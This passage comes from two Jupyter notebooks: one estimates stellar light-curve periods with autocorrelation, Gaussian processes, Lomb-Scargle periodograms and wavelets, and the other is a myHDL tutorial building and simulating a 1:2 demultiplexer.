t_d[aux_maxima][np.argmax(acf_g_conv[aux_maxima])] print('Maximum of the ACF: {0:.2f} d'.format(max_acf_kplr)) ``` ### Let's do the same for the more sparse situation... ``` acf_coeffs_spa = acf(lc_x2.flux.values, unbiased=False, nlags=len(lc_x2.flux.values) // 2) tau_k_spa = np.arange(1, acf_coeffs_spa.size + 1, 1) t_d_spa = cad2 * tau_k_spa ``` We must remember that so far we are assuming an uniform sampling . In the case of Kepler cadence, given the amount of points, for this analysis this is not a concern. In the case of a more sparse time series, changes in the cadence will make us result not be as accurate as if having a regular cadence. ``` fig, ax = plt.subplots(1, 2, figsize=(8, 4)) ax[0].scatter(t_d, acf_coeffs, alpha=0.5, label='ACF for Kepler sampling', c='navy', s=10) ax[0].scatter(t_d_spa, acf_coeffs_spa, label='ACF for downsampled data', c='orange', s=20) # Histogram of the cadence in the data ax[1].hist(np.ediff1d(lc_x2['time'].values), bins=10, histtype='stepfilled', color=['lemonchiffon'], lw=0) ax[1].hist(np.ediff1d(lc_x2['time'].values), bins=10, histtype='step', color=['orange'], lw=2) # ax[0].legend(loc='upper right') ax[0].set_xlabel(r'time $d$', fontsize=13) ax[0].set_ylabel(r'$\rho$', fontsize=13) ax[1].set_xlabel(r'$x_{(t+1)}-x_{t}$ $d$', fontsize=13) ax[1].set_ylabel('N') ax[0].set_title('ACF for both cadences', color='forestgreen') ax[1].set_title('Histogram of cadence, sparse LC', color='navy') # plt.subplots_adjust(bottom=0.2) # Local maxima aux_maxima_spa = scipy.signal.argrelextrema(acf_coeffs_spa, np.greater) # Global maxima idx_gmax = np.argmax(acf_coeffs_spa[aux_maxima_spa]) max_acf_lsst = t_d_spa[aux_maxima_spa][np.argmax(acf_coeffs_spa[aux_maxima_spa])] txt = 'Maximum of the ACF, for sparse scenario: {0:.2f} d, this represents a variation'.format(max_acf_lsst) txt += ' of {0:.2f}% respect to Kepler-sampling'.format(max_acf_lsst * 100 / max_acf_kplr - 100) print(txt) ``` A variation of 17% maybe is within our scientific expectatins, maybe not. Let's try a method to fill gaps, for the case when we miss some observatins, or need more points. Note that a previous knowledge of the expected behaviour increases our chances of get a more accurate prediction. ### Gap filling Fillig the gaps will allow us to have a more regular sampled grid. In the case when fewer observations are available, compared with the main variability length, to have an uniform sampling makes calculations more stable. **Important**: *chains of N >= 4000 and long runs, make your regression more robust. Let it run long enough!* ``` # Instance of the GP guess_period = max_acf_kplr # length_scale: while larger, the shapes of the samples elongate. Default:1. # length_scale_bounds: lower and upper bounds for lenght_scale. Let's say is a day # periodicity_bounds: lower and upper bounds in periodicity if 0: kernel = 1.0 * ExpSineSquared(length_scale=guess_period/2., periodicity=guess_period, length_scale_bounds=(guess_period, 1.1*guess_period), periodicity_bounds=(guess_period/2, 1.5 * guess_period), ) else: # Exponential Sine expsine= 1. * ExpSineSquared(length_scale=guess_period / 2., periodicity=guess_period, length_scale_bounds=(guess_period, 1.1*guess_period), periodicity_bounds=(guess_period/2, 1.5 * guess_period),) # Radial Basis Function rbf = 1.0 * RBF(length_scale=2 * guess_period, length_scale_bounds=(0.1 * guess_period, 4.0 * guess_period)) # Rational Quadratic rquad = 1. * RationalQuadratic(length_scale=np.ptp(lc_x2.time.values) / 10, alpha=1) # Matern (unstable in this scenario) matern = .5 * Matern(length_scale= 2 * guess_period, length_scale_bounds=(0.5 * guess_period, 10 *guess_period), nu=1.5) kernel = expsine + rbf # If want to replicate the result, must use same seed aux_seed = np.random # 45 gp = GaussianProcessRegressor(kernel=kernel, n_restarts_optimizer=50, random_state=aux_seed) if 1: # Calculate the prior x_prior = np.linspace(lc_x2.time.values[0], lc_x2.time.values[-1], 1000) y_mean_prior, y_std_prior = gp.predict(x_prior[:, np.newaxis], return_std=True) y_samples_prior = gp.sample_y(x_prior[:, np.newaxis], 1000) # Fit to data using Maximum Likelihood Estimation of the parameters gp.fit(lc_x2.time.values[:, np.newaxis], lc_x2.flux.values) # Posterior x_grid = np.linspace(lc_x2.time.values[0], lc_x2.time.values[-1], 1000) # Make the prediction on the meshed x-axis (ask for MSE as well) y_mean_post, y_std_post = gp.predict(x_grid[:, np.newaxis], return_std=True) y_samples_post = gp.sample_y(x_grid[:, np.newaxis], 5000) fig, ax = plt.subplots(1, figsize=(8, 4)) # Vaex for the Kepler sampling ds_K.scatter('time', 'flux', label='Kepler sampling (N={0})'.format(len(ds_K)), c='navy', alpha=0.1, s=10) # Posterior <x> ax.plot(x_grid, y_mean_post, lw=2, c='lime', label='Mean of posterior distribution') # Initial data points ax.plot(lc_x2.time, lc_x2.flux, 'o', c='w', label='LSST-like data points (N={0})'.format(len(lc_x2.index)), markersize=4, markeredgecolor='k') # ax.set_title('Gaussian Process Regression result. From 15000 to 72 data points', color='navy') ax.set_xlabel(r'time $d$', fontsize=13) ax.set_ylabel(r'flux$_{normalized}$', fontsize=13) plt.tight_layout() ax.set_facecolor('floralwhite') ax.legend(loc='upper left') t = 'Posterior\n{0}\nkernel = {1}'.format('=' * len('Posterior'),gp.kernel_) t += '\nLog-likelohood ={0:.3f}'.format(gp.log_marginal_likelihood(gp.kernel_.theta)) print(t) ``` **Note through the iterations the periodicity value was changed.** ``` if False: import pickle pickle.dump(y_mean_post, open('y_mean_posterior_lsst.pickle', 'wb')) np.save('y_mean_posterior.npy', y_mean_post) ``` ## Cross Validation Note we trained the Gaussian Process and tested/applied it on the same dataset. In this scenario the model would probably fail to predict unknown data. Then, we should have different subsets of data on which train and evaluate teh data. What are this sets? - train set: on which the training proceeds - validation set: after the training, evaluation of trained model is made on the validation set - test set: final evaluation of the model, when all looks good The problem is... many times we don't have so much data to chunk into pieces. With small *N* we coud easily fall in a strong dependece of the selection of such subsets. Here is when Cross Validation comes to save us: it uses a subsample for training and then evaluate the model on the remaining data, by *folds*. ``` from sklearn.cross_validation import cross_val_score, KFold # 1) Instance the GP # Exponential Sine expsine= 1. * ExpSineSquared(length_scale=guess_period / 2., periodicity=guess_period, length_scale_bounds=(guess_period, 1.1*guess_period), periodicity_bounds=(guess_period/2, 1.5 * guess_period),) # Radial Basis Function rbf = 1.0 * RBF(length_scale=2 * guess_period, length_scale_bounds=(0.1 * guess_period, 4.0 * guess_period)) # kernel = expsine + rbf aux_seed = np.random gaussian_pr = GaussianProcessRegressor(kernel=kernel, n_restarts_optimizer=50, random_state=aux_seed) # 2) Fit the model, using the maximization of the likelihood gaussian_pr.fit(lc_x2.time.values[:, np.newaxis], lc_x2.flux.values) # Define the Cross validation gpr_grid = { 'kernel' : [expsine + rbf], } n_kfolds = 5 CV = GridSearchCV(estimator=GaussianProcessRegressor(), param_grid=gpr_grid, n_jobs=2, cv=n_kfolds, refit=True, return_train_score=True, ) # Fit CV.fit(lc_x2.time.values[:, np.newaxis], lc_x2.flux.values) # Get the prediction, note the "phantom dimension" x_cv = np.linspace(lc_x2.time.values[0], lc_x2.time.values[-1], 1000)[:, None] y_cv = CV.predict(x_cv) fig = plt.figure(figsize=(9, 6)) gs1 = gridspec.GridSpec(3, 3) gs1.update(left=0.14, right=0.9, hspace=0.05) ax0 = fig.add_subplot(gs1[: -1, :]) ax1 = fig.add_subplot(gs1[-1, :], sharex=ax0) # Activate the first subplot plt.sca(ax0) # Vaex for the Kepler sampling ds_K.scatter('time', 'flux', label='Kepler sampling (N={0})'.format(len(ds_K)), c='navy', alpha=0.1, s=10) # CV ax0.plot(x_cv, y_cv, marker='o', color='lime', markersize=1) # # Initial data points ax0.plot(lc_x2.time, lc_x2.flux, 'o', c='w', label='LSST-like data points (N={0})'.format(len(lc_x2.index)), markersize=4, markeredgecolor='k') # Only neede d if vaex is going to be used: plt.sca(ax1) # Difference ax1.plot(x_grid, y_mean_post - y_cv, c='blueviolet', marker='*', markersize=1) # ax0.set_title('Gaussian Process Regression and Cross validation', color='green') ax0.set_ylabel(r'flux$_{normalized}$', fontsize=13) plt.tight_layout() ax0.set_facecolor('ghostwhite') ax0.legend(loc='upper left') ax1.set_xlabel(r'time $d$', fontsize=13) ax1.set_ylabel(r'posterior - cv', fontsize=13) # Results from the CV CV_res = CV.cv_results_ # Print the dictionary of the results, but in a nicer way if 0: pp = pprint.PrettyPrinter(indent=4) pp.pprint(CV_res) ``` ## Now... a different method ## Lomb Scargle Different modules available! **gatpsy**, **astropy**, **astroML**... and the less fancy **scipy** #### Starting with Fast LS ``` m_fls = gatspy.periodic.LombScargleFast(fit_period=True) m_fls.optimizer.period_range = (1, 100) m_fls.fit(lc_x.time.values, lc_x.flux.values, lc_x.e_flux.values) ``` First do the search on the coarse grid of frequencies, and then on a second step on a more fine grid ``` fls_period = m_fls.best_period ``` To plot the periodogram ``` periods = np.linspace(1, 100, 1000) scores = m_fls.score(periods) fig, ax = plt.subplots(1, figsize=(6, 4)) ax.plot(periods, scores) ax.set_xlabel(r'time $d$') ax.set_ylabel(r'periodogram power') ax.set_title('Periodogram for the Kepler-sampled LC', fontsize=13, color='forestgreen') ``` Phase diagram 1) fill an auxiliary array for the predicted shape in the phase diagram. A better fit would be using the first 4 more prominent periods 2) chunk time vector to fit in the phase plot 3) plot all together ``` aux_time = np.linspace(0, fls_period, 1000) flux_fit = m_fls.predict(aux_time) phase = (lc_x.time.values / fls_period) % 1 phasefit = (aux_time / fls_period) ds_K_phase = vx.from_arrays(phase=phase, flux=lc_x.flux.values) fig, ax = plt.subplots(1, figsize=(7, 5)) plt.sca(ax) kw = { 'vmin' : 1, 'colormap' : 'jet', 'background_color' : 'white', } ds_K_phase.plot('phase', 'flux', **kw) # ax[0].errorbar(phase, lc_x.flux.values, lc_x.e_flux.values, fmt='o') ax.plot(phasefit, flux_fit, '-', color='w') ax.set_xlim([0, 1]) ax.set_title('Phase plot', color='dimgray', fontweight='bold') ``` If we want to refine the period estimation ``` m2_fls = gatspy.periodic.LombScargleFast(fit_period=True) m2_fls.optimizer.set(period_range=(0.5 * fls_period, 2 * fls_period), first_pass_coverage=10) m2_fls.fit(lc_x.time.values, lc_x.flux.values, lc_x.e_flux.values) aux2_fls_period = m2_fls.best_period print('Optimized period: {0:.2f} d is {1} times the initial evaluation'.format(aux2_fls_period, aux2_fls_period / fls_period)) ``` For noisy light curves, a second optimization would be of special interest #### Now let's go to the traditional LS, to get the period of the sparse case Initialize the Lomb Scargle estimator ``` m_genls4 = gatspy.periodic.LombScargle(Nterms=3, fit_period=True) m_genls1 = gatspy.periodic.LombScargle(Nterms=1, fit_period=True) m_genls4.optimizer.period_range = (1, 100) m_genls1.optimizer.period_range = (1, 100) ``` Fit LS using the observed data ``` m_genls4.fit(lc_x2.time.values, lc_x2.flux.values) m_genls1.fit(lc_x2.time.values, lc_x2.flux.values) ``` Get best periods ``` genls4_periods = m_genls4.find_best_periods() genls1_periods = m_genls1.find_best_periods() ``` The most prominent periods: ``` genls4_periods, genls1_periods ``` Periodograms, internally calculating the frequency spacing ``` genls4_per = m_genls4.periodogram_auto() genls1_per = m_genls1.periodogram_auto() fig, ax = plt.subplots(1, 2, figsize=(9, 4)) ax[0].plot(genls4_per[0], genls4_per[1], ls='-', color='forestgreen') ax[1].plot(genls1_per[0], genls1_per[1], ls='-', color='darkorange') # Mark most prominent periods for p in range(len(genls4_per)): ax[0].axvline(genls4_periods[p]) ax[1].axvline(genls1_periods[p]) # Axis minimal setup for subp in ax: subp.set_xlim([1, 50]) subp.set_xlabel(r'period $d$', color='navy') subp.set_ylabel(r'power', color='navy') ax[0].set_title('LS using 4 components for fitting') ax[1].set_title('LS using 1 component for fitting') ``` ### Let's try the above on new datasets! ### BONUS: Wavelet Transform ``` time, flux = lc_x.time.values, lc_x.flux.values s0 = 0.5 sn = 2 nscales = np.log2(sn / s0) scales = np.arange(s0 / 2, sn, 0.01) m_wv = 'morl' #'morl'#'dmey' #'morl' [cfs, frequencies] = pywt.cwt(flux, scales, m_wv, ) #time[1] - time[0]) power = np.power(abs(cfs), 2) period = (1. / frequencies ) / cad1 # Auxiliary vector to sum over each frequency (period) aux_sum = np.sum(power, axis=1) # fig = plt.figure(figsize=(8, 8)) gs1 = gridspec.GridSpec(3, 5) gs1.update(left=0.14, right=0.98, hspace=0.2, wspace=0.7) ax0 = fig.add_subplot(gs1[: -1, : 3]) ax1 = fig.add_subplot(gs1[-1, : 3], sharex=ax0) ax2 = fig.add_subplot(gs1[: -1, 3 :], sharey=ax0) ax0.contourf(time, period, np.log2(power)) ax1.plot(time, flux) ax2.plot(aux_sum, np.linspace(period.min(), period.max(), aux_sum.size)) # ax0.set_yscale('log') ax0.set_ylim([period.min(), 50]) ax0.set_ylabel(r'period $d$') ax1.set_xlabel(r'time $d$') ax0.set_title('Wavelet map and its LC') ax2.set_xlabel(r'sum over period') plt.tight_layout() ```
github_jupyter
\title{myHDL Combinational Logic Elements: Demultiplexers (DEMUXs))} \author{Steven K Armour} \maketitle <h1>Table of Contents<span class="tocSkip"></span></h1> <div class="toc" style="margin-top: 1em;"><ul class="toc-item"><li><span><a href="#Refrances" data-toc-modified-id="Refrances-1"><span class="toc-item-num">1&nbsp;&nbsp;</span>Refrances</a></span></li><li><span><a href="#Libraries-and-Helper-functions" data-toc-modified-id="Libraries-and-Helper-functions-2"><span class="toc-item-num">2&nbsp;&nbsp;</span>Libraries and Helper functions</a></span></li><li><span><a href="#Demultiplexers" data-toc-modified-id="Demultiplexers-3"><span class="toc-item-num">3&nbsp;&nbsp;</span>Demultiplexers</a></span></li><li><span><a href="#1-Channel-Input:-2-Channel-Output-demultiplexer-in-Gate-Level-Logic" data-toc-modified-id="1-Channel-Input:-2-Channel-Output-demultiplexer-in-Gate-Level-Logic-4"><span class="toc-item-num">4&nbsp;&nbsp;</span>1 Channel Input: 2 Channel Output demultiplexer in Gate Level Logic</a></span><ul class="toc-item"><li><span><a href="#Sympy-Expression" data-toc-modified-id="Sympy-Expression-4.1"><span class="toc-item-num">4.1&nbsp;&nbsp;</span>Sympy Expression</a></span></li><li><span><a href="#myHDL-Module" data-toc-modified-id="myHDL-Module-4.2"><span class="toc-item-num">4.2&nbsp;&nbsp;</span>myHDL Module</a></span></li><li><span><a href="#myHDL-Testing" data-toc-modified-id="myHDL-Testing-4.3"><span class="toc-item-num">4.3&nbsp;&nbsp;</span>myHDL Testing</a></span></li><li><span><a href="#Verilog-Conversion" data-toc-modified-id="Verilog-Conversion-4.4"><span class="toc-item-num">4.4&nbsp;&nbsp;</span>Verilog Conversion</a></span></li><li><span><a href="#myHDL-to-Verilog-Testbech" data-toc-modified-id="myHDL-to-Verilog-Testbech-4.5"><span class="toc-item-num">4.5&nbsp;&nbsp;</span>myHDL to Verilog Testbech</a></span></li><li><span><a href="#PYNQ-Z1-Deployment" data-toc-modified-id="PYNQ-Z1-Deployment-4.6"><span class="toc-item-num">4.6&nbsp;&nbsp;</span>PYNQ-Z1 Deployment</a></span><ul class="toc-item"><li><span><a href="#Board-Circuit" data-toc-modified-id="Board-Circuit-4.6.1"><span class="toc-item-num">4.6.1&nbsp;&nbsp;</span>Board Circuit</a></span></li><li><span><a href="#Board-Constraints" data-toc-modified-id="Board-Constraints-4.6.2"><span class="toc-item-num">4.6.2&nbsp;&nbsp;</span>Board Constraints</a></span></li><li><span><a href="#Video-of-Deployment" data-toc-modified-id="Video-of-Deployment-4.6.3"><span class="toc-item-num">4.6.3&nbsp;&nbsp;</span>Video of Deployment</a></span></li></ul></li></ul></li><li><span><a href="#1-Channel-Input:4-Channel-Output-demultiplexer-in-Gate-Level-Logic" data-toc-modified-id="1-Channel-Input:4-Channel-Output-demultiplexer-in-Gate-Level-Logic-5"><span class="toc-item-num">5&nbsp;&nbsp;</span>1 Channel Input:4 Channel Output demultiplexer in Gate Level Logic</a></span><ul class="toc-item"><li><span><a href="#Sympy-Expression" data-toc-modified-id="Sympy-Expression-5.1"><span class="toc-item-num">5.1&nbsp;&nbsp;</span>Sympy Expression</a></span></li><li><span><a href="#myHDL-Module" data-toc-modified-id="myHDL-Module-5.2"><span class="toc-item-num">5.2&nbsp;&nbsp;</span>myHDL Module</a></span></li><li><span><a href="#myHDL-Testing" data-toc-modified-id="myHDL-Testing-5.3"><span class="toc-item-num">5.3&nbsp;&nbsp;</span>myHDL Testing</a></span></li><li><span><a href="#Verilog-Conversion" data-toc-modified-id="Verilog-Conversion-5.4"><span class="toc-item-num">5.4&nbsp;&nbsp;</span>Verilog Conversion</a></span></li><li><span><a href="#myHDL-to-Verilog-Testbench" data-toc-modified-id="myHDL-to-Verilog-Testbench-5.5"><span class="toc-item-num">5.5&nbsp;&nbsp;</span>myHDL to Verilog Testbench</a></span></li><li><span><a href="#PYNQ-Z1-Deployment" data-toc-modified-id="PYNQ-Z1-Deployment-5.6"><span class="toc-item-num">5.6&nbsp;&nbsp;</span>PYNQ-Z1 Deployment</a></span><ul class="toc-item"><li><span><a href="#Board-Circuit" data-toc-modified-id="Board-Circuit-5.6.1"><span class="toc-item-num">5.6.1&nbsp;&nbsp;</span>Board Circuit</a></span></li><li><span><a href="#Board-Constraints" data-toc-modified-id="Board-Constraints-5.6.2"><span class="toc-item-num">5.6.2&nbsp;&nbsp;</span>Board Constraints</a></span></li><li><span><a href="#Video-of-Deployment" data-toc-modified-id="Video-of-Deployment-5.6.3"><span class="toc-item-num">5.6.3&nbsp;&nbsp;</span>Video of Deployment</a></span></li></ul></li></ul></li><li><span><a href="#1-Channel-Input:4-Channel-Output-demultiplexer-via-DEMUX-Stacking" data-toc-modified-id="1-Channel-Input:4-Channel-Output-demultiplexer-via-DEMUX-Stacking-6"><span class="toc-item-num">6&nbsp;&nbsp;</span>1 Channel Input:4 Channel Output demultiplexer via DEMUX Stacking</a></span><ul class="toc-item"><li><span><a href="#myHDL-Module" data-toc-modified-id="myHDL-Module-6.1"><span class="toc-item-num">6.1&nbsp;&nbsp;</span>myHDL Module</a></span></li><li><span><a href="#myHDL-Testing" data-toc-modified-id="myHDL-Testing-6.2"><span class="toc-item-num">6.2&nbsp;&nbsp;</span>myHDL Testing</a></span></li><li><span><a href="#Verilog-Conversion" data-toc-modified-id="Verilog-Conversion-6.3"><span class="toc-item-num">6.3&nbsp;&nbsp;</span>Verilog Conversion</a></span></li><li><span><a href="#myHDL-to-Verilog-Testbench" data-toc-modified-id="myHDL-to-Verilog-Testbench-6.4"><span class="toc-item-num">6.4&nbsp;&nbsp;</span>myHDL to Verilog Testbench</a></span></li><li><span><a href="#PYNQ-Z1-Deployment" data-toc-modified-id="PYNQ-Z1-Deployment-6.5"><span class="toc-item-num">6.5&nbsp;&nbsp;</span>PYNQ-Z1 Deployment</a></span><ul class="toc-item"><li><span><a href="#Board-Circuit" data-toc-modified-id="Board-Circuit-6.5.1"><span class="toc-item-num">6.5.1&nbsp;&nbsp;</span>Board Circuit</a></span></li><li><span><a href="#Board-Constraint" data-toc-modified-id="Board-Constraint-6.5.2"><span class="toc-item-num">6.5.2&nbsp;&nbsp;</span>Board Constraint</a></span></li><li><span><a href="#Video-of-Deployment" data-toc-modified-id="Video-of-Deployment-6.5.3"><span class="toc-item-num">6.5.3&nbsp;&nbsp;</span>Video of Deployment</a></span></li></ul></li></ul></li><li><span><a href="#1:2-DEMUX-via-Behavioral-IF" data-toc-modified-id="1:2-DEMUX-via-Behavioral-IF-7"><span class="toc-item-num">7&nbsp;&nbsp;</span>1:2 DEMUX via Behavioral IF</a></span><ul class="toc-item"><li><span><a href="#myHDL-Module" data-toc-modified-id="myHDL-Module-7.1"><span class="toc-item-num">7.1&nbsp;&nbsp;</span>myHDL Module</a></span></li><li><span><a href="#myHDL-Testing" data-toc-modified-id="myHDL-Testing-7.2"><span class="toc-item-num">7.2&nbsp;&nbsp;</span>myHDL Testing</a></span></li><li><span><a href="#Verilog-Conversion" data-toc-modified-id="Verilog-Conversion-7.3"><span class="toc-item-num">7.3&nbsp;&nbsp;</span>Verilog Conversion</a></span></li><li><span><a href="#myHDL-to-Verilog-Testbench" data-toc-modified-id="myHDL-to-Verilog-Testbench-7.4"><span class="toc-item-num">7.4&nbsp;&nbsp;</span>myHDL to Verilog Testbench</a></span></li><li><span><a href="#PYNQ-Z1-Deployment" data-toc-modified-id="PYNQ-Z1-Deployment-7.5"><span class="toc-item-num">7.5&nbsp;&nbsp;</span>PYNQ-Z1 Deployment</a></span><ul class="toc-item"><li><span><a href="#Board-Circuit" data-toc-modified-id="Board-Circuit-7.5.1"><span class="toc-item-num">7.5.1&nbsp;&nbsp;</span>Board Circuit</a></span></li><li><span><a href="#Board-Constraint" data-toc-modified-id="Board-Constraint-7.5.2"><span class="toc-item-num">7.5.2&nbsp;&nbsp;</span>Board Constraint</a></span></li><li><span><a href="#Video-of-Deployment" data-toc-modified-id="Video-of-Deployment-7.5.3"><span class="toc-item-num">7.5.3&nbsp;&nbsp;</span>Video of Deployment</a></span></li></ul></li></ul></li><li><span><a href="#1:4-DEMUX-via-Behavioral-if-elif-else" data-toc-modified-id="1:4-DEMUX-via-Behavioral-if-elif-else-8"><span class="toc-item-num">8&nbsp;&nbsp;</span>1:4 DEMUX via Behavioral if-elif-else</a></span><ul class="toc-item"><li><span><a href="#myHDL-Module" data-toc-modified-id="myHDL-Module-8.1"><span class="toc-item-num">8.1&nbsp;&nbsp;</span>myHDL Module</a></span></li><li><span><a href="#myHDL-Testing" data-toc-modified-id="myHDL-Testing-8.2"><span class="toc-item-num">8.2&nbsp;&nbsp;</span>myHDL Testing</a></span></li><li><span><a href="#Verilog-Conversion" data-toc-modified-id="Verilog-Conversion-8.3"><span class="toc-item-num">8.3&nbsp;&nbsp;</span>Verilog Conversion</a></span></li><li><span><a href="#myHDL-to-Verilog-Testbench" data-toc-modified-id="myHDL-to-Verilog-Testbench-8.4"><span class="toc-item-num">8.4&nbsp;&nbsp;</span>myHDL to Verilog Testbench</a></span></li><li><span><a href="#PYNQ-Z1-Deployment" data-toc-modified-id="PYNQ-Z1-Deployment-8.5"><span class="toc-item-num">8.5&nbsp;&nbsp;</span>PYNQ-Z1 Deployment</a></span><ul class="toc-item"><li><span><a href="#Board-Circuit" data-toc-modified-id="Board-Circuit-8.5.1"><span class="toc-item-num">8.5.1&nbsp;&nbsp;</span>Board Circuit</a></span></li><li><span><a href="#Board-Constraint" data-toc-modified-id="Board-Constraint-8.5.2"><span class="toc-item-num">8.5.2&nbsp;&nbsp;</span>Board Constraint</a></span></li><li><span><a href="#Video-of-Deployment" data-toc-modified-id="Video-of-Deployment-8.5.3"><span class="toc-item-num">8.5.3&nbsp;&nbsp;</span>Video of Deployment</a></span></li></ul></li></ul></li><li><span><a href="#Demultiplexer-1:4-Behavioral-via-Bitvectors" data-toc-modified-id="Demultiplexer-1:4-Behavioral-via-Bitvectors-9"><span class="toc-item-num">9&nbsp;&nbsp;</span>Demultiplexer 1:4 Behavioral via Bitvectors</a></span><ul class="toc-item"><li><span><a href="#myHDL-Module" data-toc-modified-id="myHDL-Module-9.1"><span class="toc-item-num">9.1&nbsp;&nbsp;</span>myHDL Module</a></span></li><li><span><a href="#myHDL-Testing" data-toc-modified-id="myHDL-Testing-9.2"><span class="toc-item-num">9.2&nbsp;&nbsp;</span>myHDL Testing</a></span></li><li><span><a href="#Verilog-Conversion" data-toc-modified-id="Verilog-Conversion-9.3"><span class="toc-item-num">9.3&nbsp;&nbsp;</span>Verilog Conversion</a></span></li><li><span><a href="#myHDL-to-Verilog-Testbench" data-toc-modified-id="myHDL-to-Verilog-Testbench-9.4"><span class="toc-item-num">9.4&nbsp;&nbsp;</span>myHDL to Verilog Testbench</a></span></li><li><span><a href="#PYNQ-Z1-Board-Deployment" data-toc-modified-id="PYNQ-Z1-Board-Deployment-9.5"><span class="toc-item-num">9.5&nbsp;&nbsp;</span>PYNQ-Z1 Board Deployment</a></span><ul class="toc-item"><li><span><a href="#Board-Circuit" data-toc-modified-id="Board-Circuit-9.5.1"><span class="toc-item-num">9.5.1&nbsp;&nbsp;</span>Board Circuit</a></span></li><li><span><a href="#Board-Constraints" data-toc-modified-id="Board-Constraints-9.5.2"><span class="toc-item-num">9.5.2&nbsp;&nbsp;</span>Board Constraints</a></span></li><li><span><a href="#Video-of-Deployment" data-toc-modified-id="Video-of-Deployment-9.5.3"><span class="toc-item-num">9.5.3&nbsp;&nbsp;</span>Video of Deployment</a></span></li></ul></li></ul></li></ul></div> # Refrances # Libraries and Helper functions ``` #This notebook also uses the `(some) LaTeX environments for Jupyter` #https://github.com/ProfFan/latex_envs wich is part of the #jupyter_contrib_nbextensions package from myhdl import * from myhdlpeek import Peeker import numpy as np import pandas as pd import matplotlib.pyplot as plt %matplotlib inline from sympy import * init_printing() import itertools #EE drawing tools in python from https://cdelker.bitbucket.io/SchemDraw/ import SchemDraw as schem import SchemDraw.elements as e import SchemDraw.logic as l #https://github.com/jrjohansson/version_information %load_ext version_information %version_information myhdl, myhdlpeek, numpy, pandas, matplotlib, sympy, itertools, SchemDraw #helper functions to read in the .v and .vhd generated files into python def VerilogTextReader(loc, printresult=True): with open(f'{loc}.v', 'r') as vText: VerilogText=vText.read() if printresult: print(f'***Verilog modual from {loc}.v***\n\n', VerilogText) return VerilogText def VHDLTextReader(loc, printresult=True): with open(f'{loc}.vhd', 'r') as vText: VerilogText=vText.read() if printresult: print(f'***VHDL modual from {loc}.vhd***\n\n', VerilogText) return VerilogText def ConstraintXDCTextReader(loc, printresult=True): with open(f'{loc}.xdc', 'r') as xdcText: ConstraintText=xdcText.read() if printresult: print(f'***Constraint file from {loc}.xdc***\n\n', ConstraintText) return ConstraintText def TruthTabelGenrator(BoolSymFunc): """ Function to generate a truth table from a sympy boolian expression BoolSymFunc: sympy boolian expression return TT: a Truth table stored in a pandas dataframe """ colsL=sorted([i for i in list(BoolSymFunc.rhs.atoms())], key=lambda x:x.sort_key()) colsR=sorted([i for i in list(BoolSymFunc.lhs.atoms())], key=lambda x:x.sort_key()) bitwidth=len(colsL) cols=colsL+colsR; cols TT=pd.DataFrame(columns=cols, index=range(2**bitwidth)) for i in range(2**bitwidth): inputs=[int(j) for j in list(np.binary_repr(i, bitwidth))] outputs=BoolSymFunc.rhs.subs({j:v for j, v in zip(colsL, inputs)}) inputs.append(int(bool(outputs))) TT.iloc[i]=inputs return TT ``` # Demultiplexers \begin{definition}\label{def:MUX} A Demultiplexer, typically referred to as a DEMUX, is a Digital(or analog) switching unit that takes one input channel to be streamed to a single output channel from many via a control input. For single input DEMUXs with $2^n$ outputs, there are then $n$ input selection signals that make up the control word to select the output channel for the input. Thus a DEMUX is the conjugate digital element to the MUX such that a MUX is an $N:1$ mapping device and a DEMUX is a $1:N$ mapping device. From a behavioral standpoint DEMUXs are implemented with the same `if-elif-else (case)` control statements as a MUX but for each case, all outputs must be specified. Furthermore, DEMUXs are often implemented via stacked MUXs since there governing equation is the Product SET (Cartesian product) all internal products of a MUXs SOP equation \end{definition} # 1 Channel Input: 2 Channel Output demultiplexer in Gate Level Logic \begin{figure} \centerline{\includegraphics{DEMUX12Gate.png}} \caption{\label{fig:D12G} 1:2 DEMUX Symbol and Gate internals} \end{figure} ## Sympy Expression ``` x, s, y0, y1=symbols('x, s, y_0, y_1') y12_0Eq=Eq(y0, ~s&x) y12_1Eq=Eq(y1, s&x) y12_0Eq, y12_1Eq T0=TruthTabelGenrator(y12_0Eq) T1=TruthTabelGenrator(y12_1Eq) T10=pd.merge(T1, T0, how='left') T10 y12_0EqN=lambdify([s, x], y12_0Eq.rhs, dummify=False) y12_1EqN=lambdify([s, x], y12_1Eq.rhs, dummify=False) SystmaticVals=np.array(list(itertools.product([0,1], repeat=2))) print(SystmaticVals) print(y12_0EqN(SystmaticVals[:, 0], SystmaticVals[:, 1]).astype(int)) print(y12_1EqN(SystmaticVals[:, 0], SystmaticVals[:, 1]).astype(int)) ``` ## myHDL Module ``` @block def DEMUX1_2_Combo(x, s, y0, y1): """ 1:2 DEMUX written in full combo Inputs: x(bool): input feed s(bool): channel select Outputs: y0(bool): ouput channel 0 y1(bool): ouput channel 1 """ @always_comb def logic(): y0.next= not s and x y1.next= s and x return instances() ``` ## myHDL Testing ``` TestLen=10 SystmaticVals=list(itertools.product([0,1], repeat=2)) xTVs=np.array([i[1] for i in SystmaticVals]).astype(int) np.random.seed(15) xTVs=np.append(xTVs, np.random.randint(0,2, TestLen)).astype(int) sTVs=np.array([i[0] for i in SystmaticVals]).astype(int) #the random genrator must have a differint seed beween each generation #call in order to produce differint values for each call np.random.seed(16) sTVs=np.append(sTVs, np.random.randint(0,2, TestLen)).astype(int) TestLen=len(xTVs) SystmaticVals, sTVs, xTVs Peeker.clear() x=Signal(bool(0)); Peeker(x, 'x') s=Signal(bool(0)); Peeker(s, 's') y0=Signal(bool(0)); Peeker(y0, 'y0') y1=Signal(bool(0)); Peeker(y1, 'y1') DUT=DEMUX1_2_Combo(x, s, y0, y1) def DEMUX1_2_Combo_TB(): """ myHDL only testbench for module `DEMUX1_2_Combo` """ @instance def stimules(): for i in range(TestLen): x.next=int(xTVs[i]) s.next=int(sTVs[i]) yield delay(1) raise StopSimulation() return instances() sim=Simulation(DUT, DEMUX1_2_Combo_TB(), *Peeker.instances()).run() Peeker.to_wavedrom('x', 's', 'y0','y1') DEMUX1_2_ComboData=Peeker.to_dataframe() DEMUX1_2_ComboData=DEMUX1_2_ComboData[['x', 's', 'y0','y1']] DEMUX1_2_ComboData DEMUX1_2_ComboData['y0Ref']=DEMUX1_2_ComboData.apply(lambda row:y12_0EqN(row['s'], row['x']), axis=1).astype(int) DEMUX1_2_ComboData['y1Ref']=DEMUX1_2_ComboData.apply(lambda row:y12_1EqN(row['s'], row['x']), axis=1).astype(int) DEMUX1_2_ComboData Test0=(DEMUX1_2_ComboData['y0']==DEMUX1_2_ComboData['y0Ref']).all() Test1=(DEMUX1_2_ComboData['y1']==DEMUX1_2_ComboData['y1Ref']).all() Test=Test0&Test1 